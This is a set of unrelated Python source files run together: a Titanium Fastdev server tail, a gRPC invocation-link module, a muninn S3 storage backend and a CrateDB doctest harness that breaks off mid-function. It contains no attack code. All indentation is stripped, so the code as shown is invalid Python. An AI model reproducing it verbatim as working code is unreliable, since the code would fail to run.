if FastDevHandler.app_handler != None:
try:
FastDevHandler.app_handler.send_tokens("kill")
self.send_tokens("OK")
except Exception, e:
logging.error("kill: error: %s" % e)
self.send_tokens(str(e))
else:
self.send_tokens("App not connected")
logging.warn("kill: no app is connected")
def handle_restart_app(self):
logging.info("request: restart-app")
if FastDevHandler.app_handler != None:
try:
FastDevHandler.app_handler.send_tokens("restart")
self.send_tokens("OK")
except Exception, e:
logging.error("restart: error: %s" % e)
self.send_tokens(str(e))
else:
self.send_tokens("App not connected")
logging.warn("restart: no app is connected")
def handle_status(self):
logging.info("request: status")
global server
global request_count
global start_time
app_connected = FastDevHandler.app_handler != None
status = {
"uptime": int(time.time() - start_time),
"pid": os.getpid(),
"app_connected": app_connected,
"request_count": request_count,
"port": server.server_address[1]
}
self.send_tokens(simplejson.dumps(status))
def handle_shutdown(self):
self.send_tokens("OK")
server.shutdown()
idle_thread.running = False
class ThreadingTCPServer(SocketServer.ThreadingMixIn, TCPServer):
def shutdown_noblock(self):
if sys.version_info < (2, 6):
self.__serving = False
elif sys.version_info < (2, 7):
self._BaseServer__serving = False
else:
self._BaseServer__shutdown_request = True
class FastDevRequest(object):
def __init__(self, dir, options):
self.lock_file = get_lock_file(dir, options)
if not os.path.exists(self.lock_file):
print >>sys.stderr, "Error: No Fastdev Servers found. " \
"The lock file at %s does not exist, you either need to run \"stop\" " \
"within your Titanium project or specify the lock file with -l <lock file>" \
% self.lock_file
sys.exit(1)
f = open(self.lock_file, 'r')
self.data = simplejson.loads(f.read())
f.close()
self.port = self.data["port"]
self.app_guid = self.data["app_guid"]
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect((socket.gethostname(), self.port))
send_tokens(self.socket, "script-handshake", self.app_guid)
response = read_tokens(self.socket)[0]
if response != "OK":
print >>sys.stderr, "Error: Handshake was not accepted by the Fastdev server"
sys.exit(1)
def send(self, *tokens):
send_tokens(self.socket, *tokens)
return read_tokens(self.socket)
def close(self):
self.socket.close()
def get_lock_file(dir, options):
lock_file = options.lock_file
if lock_file == None:
lock_file = os.path.join(dir, ".fastdev.lock")
return lock_file
def start_server(dir, options):
xml = tiapp.TiAppXML(os.path.join(dir, "tiapp.xml"))
app_id = xml.properties["id"]
app_guid = xml.properties["guid"]
lock_file = get_lock_file(dir, options)
if os.path.exists(lock_file):
print "Fastdev server already running for %s" % app_id
sys.exit(0)
resources_dir = os.path.join(dir, 'Resources')
FastDevHandler.resources_dir = resources_dir
FastDevHandler.handshake = app_guid
global server
global idle_thread
server = ThreadingTCPServer(("", int(options.port)), FastDevHandler)
port = server.server_address[1]
logging.info("Serving up files for %s at 0.0.0.0:%d from %s" % (app_id, port, dir))
f = open(lock_file, 'w+')
f.write(simplejson.dumps({
"ip": "0.0.0.0",
"port": port,
"dir": dir,
"app_id": app_id,
"app_guid": app_guid
}))
f.close()
try:
idle_thread = IdleThread(int(options.timeout))
idle_thread.start()
server.serve_forever()
except KeyboardInterrupt, e:
idle_thread.running = False
server.shutdown_noblock()
print "Terminated"
logging.info("Fastdev server stopped.")
os.unlink(lock_file)
def stop_server(dir, options):
request = FastDevRequest(dir, options)
print request.send("shutdown")[0]
request.close()
print "Fastdev server for %s stopped." % request.data["app_id"]
def kill_app(dir, options):
request = FastDevRequest(dir, options)
result = request.send("kill-app")
request.close()
if result and result[0] == "OK":
print "Killed app %s." % request.data["app_id"]
return True
else:
print "Error killing app, result: %s" % result
return False
def restart_app(dir, options):
request = FastDevRequest(dir, options)
result = request.send("restart-app")
request.close()
if result and result[0] == "OK":
print "Restarted app %s." % request.data["app_id"]
return True
else:
print "Error restarting app, result: %s" % result
return False
def is_running(dir):
class Options(object): pass
options = Options()
options.lock_file = os.path.join(dir, '.fastdev.lock')
if not os.path.exists(options.lock_file):
return False
try:
request = FastDevRequest(dir, options)
result = request.send("status")[0]
request.close()
status = simplejson.loads(result)
return type(status) == dict
except Exception, e:
return False
def status(dir, options):
lock_file = get_lock_file(dir, options)
if lock_file == None or not os.path.exists(lock_file):
print "No Fastdev servers running in %s" % dir
else:
data = simplejson.loads(open(lock_file, 'r').read())
port = data["port"]
try:
request = FastDevRequest(dir, options)
result = request.send("status")[0]
request.close()
status = simplejson.loads(result)
print "Fastdev server running for app %s:" % data["app_id"]
print "Port: %d" % port
print "Uptime: %d sec" % status["uptime"]
print "PID: %d" % status["pid"]
print "Requests: %d" % status["request_count"]
except Exception, e:
print >>sys.stderr, "Error: .fastdev.lock found in %s, but couldn't connect to the server on port %d: %s. Try manually deleting .fastdev.lock." % (dir, port, e)
def get_optparser():
usage = """Usage: %prog [command] [options] [app-dir]
Supported Commands:
start start the fastdev server
status get the status of the fastdev server
stop stop the fastdev server
restart-app restart the app connected to this fastdev server
kill-app kill the app connected to this fastdev server
"""
parser = optparse.OptionParser(usage)
parser.add_option('-p', '--port', dest='port',
help='port to bind the server to [default: first available port]', default=0)
parser.add_option('-t', '--timeout', dest='timeout',
help='Timeout in seconds before the Fastdev server shuts itself down when it hasn\'t received a request [default: %default]',
default=30 * 60)
parser.add_option('-l', '--lock-file', dest='lock_file',
help='Path to the server lock file [default: app-dir/.fastdev.lock]',
default=None)
return parser
def main():
parser = get_optparser()
(options, args) = parser.parse_args()
if len(args) == 0 or args[0] not in ['start', 'stop', 'kill-app', 'restart-app', 'status']:
parser.error("Missing required command")
sys.exit(1)
command = args[0]
dir = os.getcwd()
if len(args) > 1:
dir = os.path.expanduser(args[1])
dir = os.path.abspath(dir)
if command == "start":
if not os.path.exists(os.path.join(dir, "tiapp.xml")):
parser.error("Directory is not a Titanium Project: %s" % dir)
sys.exit(1)
try:
start_server(dir, options)
except Exception, e:
print >>sys.stderr, "Error starting Fastdev server: %s" % e
elif command == "stop":
stop_server(dir, options)
elif command == "kill-app":
kill_app(dir, options)
elif command == 'restart-app':
restart_app(dir, options)
elif command == "status":
status(dir, options)
if __name__ == "__main__":
main()
| |
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""The RPC-invocation-side bridge between RPC Framework and GRPC-on-the-wire."""
import abc
import enum
import logging
import threading
import time
from grpc._adapter import _intermediary_low
from grpc.framework.foundation import activated
from grpc.framework.foundation import logging_pool
from grpc.framework.foundation import relay
from grpc.framework.interfaces.links import links
_IDENTITY = lambda x: x
_STOP = _intermediary_low.Event.Kind.STOP
_WRITE = _intermediary_low.Event.Kind.WRITE_ACCEPTED
_COMPLETE = _intermediary_low.Event.Kind.COMPLETE_ACCEPTED
_READ = _intermediary_low.Event.Kind.READ_ACCEPTED
_METADATA = _intermediary_low.Event.Kind.METADATA_ACCEPTED
_FINISH = _intermediary_low.Event.Kind.FINISH
@enum.unique
class _Read(enum.Enum):
AWAITING_METADATA = 'awaiting metadata'
READING = 'reading'
AWAITING_ALLOWANCE = 'awaiting allowance'
CLOSED = 'closed'
@enum.unique
class _HighWrite(enum.Enum):
OPEN = 'open'
CLOSED = 'closed'
@enum.unique
class _LowWrite(enum.Enum):
OPEN = 'OPEN'
ACTIVE = 'ACTIVE'
CLOSED = 'CLOSED'
class _RPCState(object):
def __init__(
self, call, request_serializer, response_deserializer, sequence_number,
read, allowance, high_write, low_write, due):
self.call = call
self.request_serializer = request_serializer
self.response_deserializer = response_deserializer
self.sequence_number = sequence_number
self.read = read
self.allowance = allowance
self.high_write = high_write
self.low_write = low_write
self.due = due
def _no_longer_due(kind, rpc_state, key, rpc_states):
rpc_state.due.remove(kind)
if not rpc_state.due:
del rpc_states[key]
class _Kernel(object):
def __init__(
self, channel, host, metadata_transformer, request_serializers,
response_deserializers, ticket_relay):
self._lock = threading.Lock()
self._channel = channel
self._host = host
self._metadata_transformer = metadata_transformer
self._request_serializers = request_serializers
self._response_deserializers = response_deserializers
self._relay = ticket_relay
self._completion_queue = None
self._rpc_states = {}
self._pool = None
def _on_write_event(self, operation_id, unused_event, rpc_state):
if rpc_state.high_write is _HighWrite.CLOSED:
rpc_state.call.complete(operation_id)
rpc_state.due.add(_COMPLETE)
rpc_state.due.remove(_WRITE)
rpc_state.low_write = _LowWrite.CLOSED
else:
ticket = links.Ticket(
operation_id, rpc_state.sequence_number, None, None, None, None, 1,
None, None, None, None, None, None, None)
rpc_state.sequence_number += 1
self._relay.add_value(ticket)
rpc_state.low_write = _LowWrite.OPEN
_no_longer_due(_WRITE, rpc_state, operation_id, self._rpc_states)
def _on_read_event(self, operation_id, event, rpc_state):
if event.bytes is None or _FINISH not in rpc_state.due:
rpc_state.read = _Read.CLOSED
_no_longer_due(_READ, rpc_state, operation_id, self._rpc_states)
else:
if 0 < rpc_state.allowance:
rpc_state.allowance -= 1
rpc_state.call.read(operation_id)
else:
rpc_state.read = _Read.AWAITING_ALLOWANCE
_no_longer_due(_READ, rpc_state, operation_id, self._rpc_states)
ticket = links.Ticket(
operation_id, rpc_state.sequence_number, None, None, None, None, None,
None, rpc_state.response_deserializer(event.bytes), None, None, None,
None, None)
rpc_state.sequence_number += 1
self._relay.add_value(ticket)
def _on_metadata_event(self, operation_id, event, rpc_state):
if _FINISH in rpc_state.due:
rpc_state.allowance -= 1
rpc_state.call.read(operation_id)
rpc_state.read = _Read.READING
rpc_state.due.add(_READ)
rpc_state.due.remove(_METADATA)
ticket = links.Ticket(
operation_id, rpc_state.sequence_number, None, None,
links.Ticket.Subscription.FULL, None, None, event.metadata, None,
None, None, None, None, None)
rpc_state.sequence_number += 1
self._relay.add_value(ticket)
else:
_no_longer_due(_METADATA, rpc_state, operation_id, self._rpc_states)
def _on_finish_event(self, operation_id, event, rpc_state):
_no_longer_due(_FINISH, rpc_state, operation_id, self._rpc_states)
if event.status.code is _intermediary_low.Code.OK:
termination = links.Ticket.Termination.COMPLETION
elif event.status.code is _intermediary_low.Code.CANCELLED:
termination = links.Ticket.Termination.CANCELLATION
elif event.status.code is _intermediary_low.Code.DEADLINE_EXCEEDED:
termination = links.Ticket.Termination.EXPIRATION
elif event.status.code is _intermediary_low.Code.UNKNOWN:
termination = links.Ticket.Termination.LOCAL_FAILURE
else:
termination = links.Ticket.Termination.TRANSMISSION_FAILURE
ticket = links.Ticket(
operation_id, rpc_state.sequence_number, None, None, None, None, None,
None, None, event.metadata, event.status.code, event.status.details,
termination, None)
rpc_state.sequence_number += 1
self._relay.add_value(ticket)
def _spin(self, completion_queue):
while True:
event = completion_queue.get(None)
with self._lock:
rpc_state = self._rpc_states.get(event.tag, None)
if event.kind is _STOP:
pass
elif event.kind is _WRITE:
self._on_write_event(event.tag, event, rpc_state)
elif event.kind is _METADATA:
self._on_metadata_event(event.tag, event, rpc_state)
elif event.kind is _READ:
self._on_read_event(event.tag, event, rpc_state)
elif event.kind is _FINISH:
self._on_finish_event(event.tag, event, rpc_state)
elif event.kind is _COMPLETE:
_no_longer_due(_COMPLETE, rpc_state, event.tag, self._rpc_states)
else:
logging.error('Illegal RPC event! %s', (event,))
if self._completion_queue is None and not self._rpc_states:
completion_queue.stop()
return
def _invoke(
self, operation_id, group, method, initial_metadata, payload, termination,
timeout, allowance):
"""Invoke an RPC.
Args:
operation_id: Any object to be used as an operation ID for the RPC.
group: The group to which the RPC method belongs.
method: The RPC method name.
initial_metadata: The initial metadata object for the RPC.
payload: A payload object for the RPC or None if no payload was given at
invocation-time.
termination: A links.Ticket.Termination value or None indicated whether or
not more writes will follow from this side of the RPC.
timeout: A duration of time in seconds to allow for the RPC.
allowance: The number of payloads (beyond the free first one) that the
local ticket exchange mate has granted permission to be read.
"""
if termination is links.Ticket.Termination.COMPLETION:
high_write = _HighWrite.CLOSED
elif termination is None:
high_write = _HighWrite.OPEN
else:
return
transformed_initial_metadata = self._metadata_transformer(initial_metadata)
request_serializer = self._request_serializers.get(
(group, method), _IDENTITY)
response_deserializer = self._response_deserializers.get(
(group, method), _IDENTITY)
call = _intermediary_low.Call(
self._channel, self._completion_queue, '/%s/%s' % (group, method),
self._host, time.time() + timeout)
if transformed_initial_metadata is not None:
for metadata_key, metadata_value in transformed_initial_metadata:
call.add_metadata(metadata_key, metadata_value)
call.invoke(self._completion_queue, operation_id, operation_id)
if payload is None:
if high_write is _HighWrite.CLOSED:
call.complete(operation_id)
low_write = _LowWrite.CLOSED
due = set((_METADATA, _COMPLETE, _FINISH,))
else:
low_write = _LowWrite.OPEN
due = set((_METADATA, _FINISH,))
else:
call.write(request_serializer(payload), operation_id)
low_write = _LowWrite.ACTIVE
due = set((_WRITE, _METADATA, _FINISH,))
self._rpc_states[operation_id] = _RPCState(
call, request_serializer, response_deserializer, 0,
_Read.AWAITING_METADATA, 1 if allowance is None else (1 + allowance),
high_write, low_write, due)
def _advance(self, operation_id, rpc_state, payload, termination, allowance):
if payload is not None:
rpc_state.call.write(rpc_state.request_serializer(payload), operation_id)
rpc_state.low_write = _LowWrite.ACTIVE
rpc_state.due.add(_WRITE)
if allowance is not None:
if rpc_state.read is _Read.AWAITING_ALLOWANCE:
rpc_state.allowance += allowance - 1
rpc_state.call.read(operation_id)
rpc_state.read = _Read.READING
rpc_state.due.add(_READ)
else:
rpc_state.allowance += allowance
if termination is links.Ticket.Termination.COMPLETION:
rpc_state.high_write = _HighWrite.CLOSED
if rpc_state.low_write is _LowWrite.OPEN:
rpc_state.call.complete(operation_id)
rpc_state.due.add(_COMPLETE)
rpc_state.low_write = _LowWrite.CLOSED
elif termination is not None:
rpc_state.call.cancel()
def add_ticket(self, ticket):
with self._lock:
if ticket.sequence_number == 0:
if self._completion_queue is None:
logging.error('Received invocation ticket %s after stop!', ticket)
else:
self._invoke(
ticket.operation_id, ticket.group, ticket.method,
ticket.initial_metadata, ticket.payload, ticket.termination,
ticket.timeout, ticket.allowance)
else:
rpc_state = self._rpc_states.get(ticket.operation_id)
if rpc_state is not None:
self._advance(
ticket.operation_id, rpc_state, ticket.payload,
ticket.termination, ticket.allowance)
def start(self):
"""Starts this object.
This method must be called before attempting to exchange tickets with this
object.
"""
with self._lock:
self._completion_queue = _intermediary_low.CompletionQueue()
self._pool = logging_pool.pool(1)
self._pool.submit(self._spin, self._completion_queue)
def stop(self):
"""Stops this object.
This method must be called for proper termination of this object, and no
attempts to exchange tickets with this object may be made after this method
has been called.
"""
with self._lock:
if not self._rpc_states:
self._completion_queue.stop()
self._completion_queue = None
pool = self._pool
pool.shutdown(wait=True)
class InvocationLink(links.Link, activated.Activated):
"""A links.Link for use on the invocation-side of a gRPC connection.
Implementations of this interface are only valid for use when activated.
"""
__metaclass__ = abc.ABCMeta
class _InvocationLink(InvocationLink):
def __init__(
self, channel, host, metadata_transformer, request_serializers,
response_deserializers):
self._relay = relay.relay(None)
self._kernel = _Kernel(
channel, host,
_IDENTITY if metadata_transformer is None else metadata_transformer,
{} if request_serializers is None else request_serializers,
{} if response_deserializers is None else response_deserializers,
self._relay)
def _start(self):
self._relay.start()
self._kernel.start()
return self
def _stop(self):
self._kernel.stop()
self._relay.stop()
def accept_ticket(self, ticket):
"""See links.Link.accept_ticket for specification."""
self._kernel.add_ticket(ticket)
def join_link(self, link):
"""See links.Link.join_link for specification."""
self._relay.set_behavior(link.accept_ticket)
def __enter__(self):
"""See activated.Activated.__enter__ for specification."""
return self._start()
def __exit__(self, exc_type, exc_val, exc_tb):
"""See activated.Activated.__exit__ for specification."""
self._stop()
return False
def start(self):
"""See activated.Activated.start for specification."""
return self._start()
def stop(self):
"""See activated.Activated.stop for specification."""
self._stop()
def invocation_link(
channel, host, metadata_transformer, request_serializers,
response_deserializers):
"""Creates an InvocationLink.
Args:
channel: An _intermediary_low.Channel for use by the link.
host: The host to specify when invoking RPCs.
metadata_transformer: A callable that takes an invocation-side initial
metadata value and returns another metadata value to send in its place.
May be None.
request_serializers: A dict from group-method pair to request object
serialization behavior.
response_deserializers: A dict from group-method pair to response object
deserialization behavior.
Returns:
An InvocationLink.
"""
return _InvocationLink(
channel, host, metadata_transformer, request_serializers,
response_deserializers)
| |
import json
import logging
import os
from .base import StorageBackend
from muninn.schema import Mapping, Text, Integer
import muninn.config as config
import muninn.util as util
from muninn.exceptions import Error, StorageError
import boto3
import boto3.s3
import botocore
logging.getLogger("boto3").setLevel(logging.CRITICAL)
class _S3Config(Mapping):
_alias = "s3"
host = Text()
port = Integer()
bucket = Text()
access_key = Text()
secret_access_key = Text()
region = Text(optional=True)
prefix = Text(optional=True)
tmp_root = Text(optional=True)
download_args = Text(optional=True) # JSON representation of boto3 download_file ExtraArgs parameter
upload_args = Text(optional=True) # JSON representation of boto3 upload_file ExtraArgs parameter
copy_args = Text(optional=True) # JSON representation of boto3 copy ExtraArgs parameter
transfer_config = Text(optional=True) # JSON representation of boto3.s3.transfer.TransferConfig parameters
def create(configuration):
options = config.parse(configuration.get("s3", {}), _S3Config)
_S3Config.validate(options)
return S3StorageBackend(**options)
class S3StorageBackend(StorageBackend): # TODO '/' in keys to indicate directory, 'dir/' with contents?
def __init__(self, bucket, host, port, access_key, secret_access_key, region=None, prefix='', tmp_root=None,
download_args=None, upload_args=None, copy_args=None, transfer_config=None):
super(S3StorageBackend, self).__init__()
self.bucket = bucket
if prefix and not prefix.endswith('/'):
prefix += '/'
self._prefix = prefix
if port == 80:
export_port = ''
else:
export_port = ':%d' % port
self.global_prefix = os.path.join('http://%s%s/%s' % (host, export_port, bucket), prefix)
self._root = bucket
if tmp_root:
tmp_root = os.path.realpath(tmp_root)
util.make_path(tmp_root)
self._tmp_root = tmp_root
self._resource = boto3.resource(
service_name='s3',
region_name=region,
aws_access_key_id=access_key,
aws_secret_access_key=secret_access_key,
endpoint_url='http://%s:%s' % (host, port),
)
self._download_args = None
if download_args:
self._download_args = json.loads(download_args)
self._upload_args = None
if upload_args:
self._upload_args = json.loads(upload_args)
self._copy_args = None
if copy_args:
self._copy_args = json.loads(copy_args)
if transfer_config:
self._transfer_config = boto3.s3.transfer.TransferConfig(**json.loads(transfer_config))
else:
self._transfer_config = boto3.s3.transfer.TransferConfig()
def _bucket_exists(self):
try:
self._resource.meta.client.head_bucket(Bucket=self.bucket)
return True
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] == "404":
return False
else:
raise
def _prefix_exists(self):
if self._prefix: # TODO created but still empty archive
objs = list(self._resource.Bucket(self.bucket).objects.limit(count=1).filter(Prefix=self._prefix))
return len(objs) == 1
else:
return True
def prepare(self):
if not self._bucket_exists():
self._resource.create_bucket(Bucket=self.bucket)
def exists(self):
return self._bucket_exists() and self._prefix_exists()
def destroy(self):
if self._prefix:
self._resource.Bucket(self.bucket).objects.filter(Prefix=self._prefix).delete()
elif self._bucket_exists():
bucket = self._resource.Bucket(self.bucket)
bucket.objects.all().delete()
bucket.delete()
def product_path(self, product): # TODO needed?
return os.path.join(product.core.archive_path, product.core.physical_name)
def current_archive_path(self, paths):
raise Error("S3 storage backend does not support ingesting already archived products")
def _upload_file(self, key, path):
obj = self._resource.Object(self.bucket, key)
if os.path.getsize(path) == 0: # TODO otherwise upload_file hangs sometimes!?
self._resource.Object(self.bucket, key).put()
else:
obj.upload_file(path, ExtraArgs=self._upload_args, Config=self._transfer_config)
def _create_dir(self, key):
# using put, as upload_file/upload_fileobj do not like the trailish slash
self._resource.Object(self.bucket, key+'/').put()
def put(self, paths, properties, use_enclosing_directory, use_symlinks=None,
retrieve_files=None, run_for_product=None):
if use_symlinks:
raise Error("S3 storage backend does not support symlinks")
anything_stored = False
try:
archive_path = properties.core.archive_path
physical_name = properties.core.physical_name
if not use_enclosing_directory and retrieve_files is None:
assert(len(paths) == 1 and os.path.basename(paths[0]) == physical_name)
tmp_root = self.get_tmp_root(properties)
with util.TemporaryDirectory(dir=tmp_root, prefix=".put-",
suffix="-%s" % properties.core.uuid.hex) as tmp_path:
if retrieve_files:
paths = retrieve_files(tmp_path)
# Upload file(s)
for path in paths:
key = self._prefix + os.path.join(archive_path, physical_name)
# Add enclosing dir
if use_enclosing_directory:
key = os.path.join(key, os.path.basename(path))
if os.path.isdir(path):
self._create_dir(key)
anything_stored = True
for root, subdirs, files in os.walk(path):
rel_root = os.path.relpath(root, path)
for subdir in subdirs:
dirkey = os.path.normpath(os.path.join(key, rel_root, subdir))
self._create_dir(dirkey)
anything_stored = True
for filename in files:
filekey = os.path.normpath(os.path.join(key, rel_root, filename))
filepath = os.path.join(root, filename)
self._upload_file(filekey, filepath)
anything_stored = True
else:
self._upload_file(key, path)
anything_stored = True
if run_for_product is not None:
run_for_product(paths)
except Exception as e:
raise StorageError(e, anything_stored)
def get(self, product, product_path, target_path, use_enclosing_directory, use_symlinks=None):
if use_symlinks:
raise Error("S3 storage backend does not support symlinks")
archive_path = product.core.archive_path
prefix = self._prefix + product_path
objs = list(self._resource.Bucket(self.bucket).objects.filter(Prefix=prefix))
if not objs:
raise Error("no data for product '%s' (%s)" % (product.core.product_name, product.core.uuid))
for obj in objs:
rel_path = os.path.relpath(obj.key, self._prefix + archive_path)
if use_enclosing_directory:
rel_path = '/'.join(rel_path.split('/')[1:])
target = os.path.normpath(os.path.join(target_path, rel_path))
if obj.key.endswith('/'):
util.make_path(target)
else:
util.make_path(os.path.dirname(target))
self._resource.Object(self.bucket, obj.key).download_file(target, ExtraArgs=self._download_args,
Config=self._transfer_config)
def delete(self, product_path, properties):
prefix = self._prefix + product_path
for obj in self._resource.Bucket(self.bucket).objects.filter(Prefix=prefix):
obj.delete()
def size(self, product_path):
total = 0
prefix = self._prefix + product_path
for obj in self._resource.Bucket(self.bucket).objects.filter(Prefix=prefix):
total += obj.size
return total
def move(self, product, archive_path, paths=None):
# Ignore if product already there
if product.core.archive_path == archive_path:
return paths
product_path = self._prefix + self.product_path(product)
new_product_path = self._prefix + os.path.join(archive_path, product.core.physical_name)
objs = list(self._resource.Bucket(self.bucket).objects.filter(Prefix=product_path))
if not objs:
raise Error("no data for product '%s' (%s)" % (product.core.product_name, product.core.uuid))
for obj in objs:
new_key = os.path.normpath(os.path.join(new_product_path, os.path.relpath(obj.key, product_path)))
self._resource.Object(self.bucket, new_key).copy(CopySource={'Bucket': self.bucket, 'Key': obj.key},
ExtraArgs=self._copy_args, Config=self._transfer_config)
self._resource.Object(self.bucket, obj.key).delete()
return paths
| |
import unittest
import doctest
import zc.customdoctests
from crate.testing.layer import CrateLayer
import os
import shutil
import re
from . import process_test
from .paths import crate_path, project_path
from .ports import GLOBAL_PORT_POOL
from crate.crash.command import CrateCmd
from crate.crash.printer import PrintWrapper, ColorPrinter
from crate.client import connect
CRATE_HTTP_PORT = GLOBAL_PORT_POOL.get()
CRATE_TRANSPORT_PORT = GLOBAL_PORT_POOL.get()
class CrateTestCmd(CrateCmd):
def __init__(self, **kwargs):
super(CrateTestCmd, self).__init__(**kwargs)
doctest_print = PrintWrapper()
self.logger = ColorPrinter(False, stream=doctest_print, line_end='\n')
def stmt(self, stmt):
stmt = stmt.replace('\n', ' ')
if stmt.startswith('\\'):
self.process(stmt)
else:
self.execute(stmt)
cmd = CrateTestCmd(is_tty=False)
def wait_for_schema_update(schema, table, column):
conn = connect('localhost:' + str(CRATE_HTTP_PORT))
c = conn.cursor()
count = 0
while count == 0:
c.execute(('select count(*) from information_schema.columns '
'where schema_name = ? and table_name = ? '
'and column_name = ?'),
(schema, table, column))
count = c.fetchone()[0]
def bash_transform(s):
# The examples in the docs show the real port '4200' to a reader.
# Our test suite requires the port to be '44200' to avoid conflicts.
# Therefore, we need to replace the ports before a test is being run.
s = s.replace(':4200/', ':{0}/'.format(CRATE_HTTP_PORT))
if s.startswith("crash"):
s = re.search(r"crash\s+-c\s+\"(.*?)\"", s).group(1)
return u'cmd.stmt({0})'.format(repr(s.strip().rstrip(';')))
return (
r'import subprocess;'
r'print(subprocess.check_output(r"""%s""",stderr=subprocess.STDOUT,shell=True).decode("utf-8"))' % s) + '\n'
def crash_transform(s):
# The examples in the docs show the real port '4200' to a reader.
# Our test suite requires the port to be '44200' to avoid conflicts.
# Therefore, we need to replace the ports before a test is being run.
if s.startswith('_'):
return s[1:]
s = s.replace(':4200', ':{0}'.format(CRATE_HTTP_PORT))
return u'cmd.stmt({0})'.format(repr(s.strip().rstrip(';')))
bash_parser = zc.customdoctests.DocTestParser(
ps1='sh\$', comment_prefix='#', transform=bash_transform)
crash_parser = zc.customdoctests.DocTestParser(
ps1='cr>', comment_prefix='#', transform=crash_transform)
class ConnectingCrateLayer(CrateLayer):
def start(self):
super(ConnectingCrateLayer, self).start()
cmd._connect(self.crate_servers[0])
empty_layer = ConnectingCrateLayer(
'crate',
crate_home=crate_path(),
crate_exec=crate_path('bin', 'crate'),
port=CRATE_HTTP_PORT,
transport_port=CRATE_TRANSPORT_PORT,
settings={
'gateway.type': 'none',
'index.store.type': 'memory',
'cluster.routing.schedule': '30ms'
}
)
def setUpLocations(test):
test.globs['cmd'] = cmd
cmd.stmt("""
create table locations (
id string primary key,
name string,
date timestamp,
kind string,
position integer,
description string,
race object(dynamic) as (
interests array(string)
),
information array(object as (
population long,
evolution_level short
)
),
index name_description_ft using fulltext(name, description) with (analyzer='english')
) clustered by(id) into 2 shards with (number_of_replicas=0)""".strip())
cmd.stmt("delete from locations")
locations_file = os.path.abspath(os.path.join(os.path.dirname(__file__), "locations.json"))
cmd.stmt("""copy locations from '{0}'""".format(locations_file))
cmd.stmt("""refresh table locations""")
def tearDownLocations(test):
cmd.stmt("""drop table locations""")
def setUpUserVisits(test):
test.globs['cmd'] = cmd
cmd.stmt("""
create table uservisits (
id integer primary key,
name string,
visits integer,
last_visit timestamp
)
""".strip())
uservisits_file = os.path.abspath(os.path.join(os.path.dirname(__file__), "uservisits.json"))
cmd.stmt("""copy uservisits from '{0}'""".format(uservisits_file))
cmd.stmt("""refresh table uservisits""")
def tearDownUserVisits(test):
cmd.stmt("""drop table uservisits""")
def setUpQuotes(test):
test.globs['cmd'] = cmd
cmd.stmt("""
create table quotes (
id integer primary key,
quote string
) clustered by(id) into 2 shards with(number_of_replicas=0)""")
import_dir = '/tmp/import_data'
if not os.path.isdir(import_dir):
os.mkdir(import_dir)
shutil.copy(project_path('sql/src/test/resources/essetup/data/copy', 'test_copy_from.json'),
os.path.join(import_dir, "quotes.json"))
def tearDownQuotes(test):
cmd.stmt("""drop table quotes""")
def setUpLocationsAndQuotes(test):
setUpLocations(test)
setUpQuotes(test)
def tearDownLocationsAndQuotes(test):
tearDownLocations(test)
tearDownQuotes(test)
def setUpLocationsQuotesAndUserVisits(test):
setUpLocationsAndQuotes(test)
setUpUserVisits(test)
def tearDownLocationsQuotesAndUserVisits(test):
tearDownLocationsAndQuotes(test)
tearDownUserVisits(test)
def setUpTutorials(test):
setUp(test)
import_dir = '/tmp/best_practice_data'
source_dir = 'sql/src/test/resources/essetup/data/best_practice'
if not os.path.isdir(import_dir):
os.mkdir(import_dir)
shutil.copy(project_path(source_dir, 'data_import.json'),
os.path.join(import_dir, "users.json"))
shutil.copy(project_path(source_dir, 'data_import.json.gz'),
os.path.join(import_dir, "users.json.gz"))
shutil.copy(project_path(source_dir, 'data_import_1408312800.json'),
os.path.join(import_dir, "users_1408312800.json"))
def setUp(test):
test.globs['cmd'] = cmd
test.globs['wait_for_schema_update'] = wait_for_schema_update
def test_suite():
suite = unittest.TestSuite()
# Graceful stop tests
process_suite = unittest.TestLoader().loadTestsFromModule(process_test)
suite.addTest(process_suite)
# Documentation tests
docs_suite = unittest.TestSuite()
s = doctest.DocFileSuite('../../blob.txt',
parser=bash_parser,
setUp=setUp,
optionflags=doctest.NORMALIZE_WHITESPACE |
doctest.ELLIPSIS)
s.layer = empty_layer
docs_suite.addTest(s)
for fn in ('sql/rest.txt',):
s = doctest.DocFileSuite('../../' + fn,
parser=bash_parser,
setUp=setUpLocations,
tearDown=tearDownLocations,
optionflags=doctest.NORMALIZE_WHITESPACE |
doctest.ELLIPSIS)
s.layer = empty_layer
docs_suite.addTest(s)
for fn in ('sql/ddl.txt',
'sql/dql.txt',
'sql/refresh.txt',
'sql/fulltext.txt',
'sql/data_types.txt',
'sql/occ.txt',
'sql/information_schema.txt',
'sql/partitioned_tables.txt',
'sql/aggregation.txt',
'sql/arithmetic.txt',
'sql/scalar.txt',
'sql/system.txt',
'sql/queries.txt',
'hello.txt'):
s = doctest.DocFileSuite('../../' + fn, parser=crash_parser,
setUp=setUpLocationsAndQuotes,
tearDown=tearDownLocationsAndQuotes,
